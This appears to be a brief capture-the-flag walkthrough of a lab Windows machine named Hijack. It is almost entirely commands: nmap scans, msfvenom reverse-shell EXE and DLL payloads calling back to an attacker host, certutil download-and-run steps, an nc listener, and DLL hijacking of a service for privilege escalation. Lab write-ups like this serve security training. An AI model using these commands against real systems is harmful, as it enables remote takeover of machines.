nmap -A -p- -oA output 172.31.1.27 --min-rate=10000 --script=vuln --script-timeout=15 -v

nmap -p- -sS --min-rate=5000 --open -vvv -n -Pn 172.31.1.27 -oG allPorts

Pasted image 20210705082604.png

extractPorts allPorts

Pasted image 20210705082630.png

nmap -sC -sV -p80,135,139,445,3389,5985,47001 172.31.1.27 -oN targeted

Pasted image 20210705083017.png

nmap --script http-enum -p80 172.31.1.27 -oN webScan

Pasted image 20210705084146.png

whatweb 172.31.1.27:80

Pasted image 20210705084235.png

cat targeted

Pasted image 20210705084314.png

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.12 LPORT=4444 -f exe -o reverse_hijack.exe

Pasted image 20210705084931.png

Pasted image 20210705105202.png

ruby 44449.rb 172.31.1.27

python3 -m http.server 8888

certutil.exe -urlcache -split -f “http://10.10.0.12:8888/reverse_hijack.exe” reverse_hijack.exe

nc -lvnp 4444

Pasted image 20210705113403.png

cd C:\Users\jack\Desktop\

file access.txt

Pasted image 20210705113707.png

certutil.exe -urlcache -split -f http://10.10.0.12:8888/winPEASany.exe winPEASany.exe

Pasted image 20210705113840.png

cd C:\Program Files\Hijack\Libraries

sc query Hijack

Pasted image 20210705115659.png

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.0.12 LPORT=5555 -f dll -o Custom.dll

Pasted image 20210705120354.png

cd Program Files\Hijack\Libraries

certutil.exe -urlcache -f http://10.10.0.12:8888/Custom.dll Custom.dll

sc start Hijack

Pasted image 20210705135611.png

boxes

copyright©2022 Cu3rv0x all rights reserved